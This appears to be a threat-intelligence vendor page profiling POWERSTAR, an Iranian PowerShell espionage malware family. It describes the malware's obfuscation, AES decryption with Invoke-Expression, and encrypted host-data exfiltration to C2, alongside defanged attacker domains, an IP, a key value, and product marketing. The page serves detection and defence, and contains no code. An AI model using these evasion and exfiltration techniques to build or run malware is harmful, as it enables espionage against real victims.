POWERSTAR
POWERSTAR is a multi-stage PowerShell-based malware framework/variant associated with Iranian cyber-espionage activity. The content links it to Charming Kitten and to the Iran-based APT group GreenCharlie, whose toolset is described as centered on PowerShell malware variants including GORBLE, TAMECAT, and POWERSTAR. Reported delivery methods include spear-phishing using fake personas and compromised email accounts, and exploitation of Microsoft Exchange vulnerabilities. The malware family uses advanced obfuscation, layered decryption, and in-memory execution to evade detection; noted obfuscation techniques include array fragments, wildcards, and string replacement. In the GreenCharlie execution chain, POWERSTAR is described as using AES-based decryption of embedded payloads and executing decrypted content via Invoke-Expression. Related staging/C2 behavior described for this framework includes collecting victim OS and computer name, formatting host data as JSON, encrypting and Base64-encoding it, and sending it via HTTP POST to command-and-control infrastructure. The content also notes overlap between TAMECAT and PowerStar artifacts, including a parameter value ($k12ey = T2r0y1M1e1n1o0w1) identified in a PowerStar variant by Volexity. High-confidence infrastructure and lure examples tied to the broader GreenCharlie framework include domains such as activeeditor[.]info, webviewerpage[.]info, documentcloudeditor.ddnsgeek[.]com, coldwarehexahash.dns-dynamic[.]net, uptime-timezone.dns-dynamic[.]net, and translatorupdater.dns-dynamic[.]net; documentcloudeditor.ddnsgeek[.]com was observed resolving to 38.180.146[.]174.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR.”
Charming Kitten... specializes in espionage through spear-phishing... to deliver POWERSTAR malware, exploiting Microsoft Exchange vulnerabilities...
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique"The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures..."
Initial Access
2 techniquesCharming Kitten, Haywire Kitten, and Remix Kitten are described as “exploiting Microsoft Exchange vulnerabilities,” including “ProxyShell.”
Multiple Iran-nexus APT groups are described as using spear-phishing: e.g., Charming Kitten uses “spear-phishing with fake personas and compromised emails… phishing via benign PDFs for credential harvesting”; several others use “spear-phishing with malicious documents/attachments/links.”
Execution
1 technique"The entire GORBLE, TAMECAT, and POWERSTAR malware family is constructed as a multi-stage PowerShell execution chain."
Stealth
1 technique"Obfuscation techniques include array fragments, wildcards, and string replacement..." and "MITRE ATT&CK techniques observed include ... obfuscated files/information (T1027)."
Command and Control
1 technique"GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure..."
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware used by Charming Kitten in spear-phishing-driven espionage operations; delivered via compromised emails/fake personas and associated with Exchange exploitation.
Referenced as a related/variant family whose obfuscation style is similar to TAMECAT; no additional functional details provided in the content.
Referenced only for overlap in a key/value and YARA-rule similarity with the analyzed TAMECAT loader; no additional functional details provided in this content.
A PowerShell-based, multi-stage malware variant in GreenCharlie’s framework. Uses staged obfuscation and AES decryption/execution; described as using Invoke-Expression (iex) to run decrypted payload content, then performing C2 beaconing and encrypted/encoded host data transmission.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.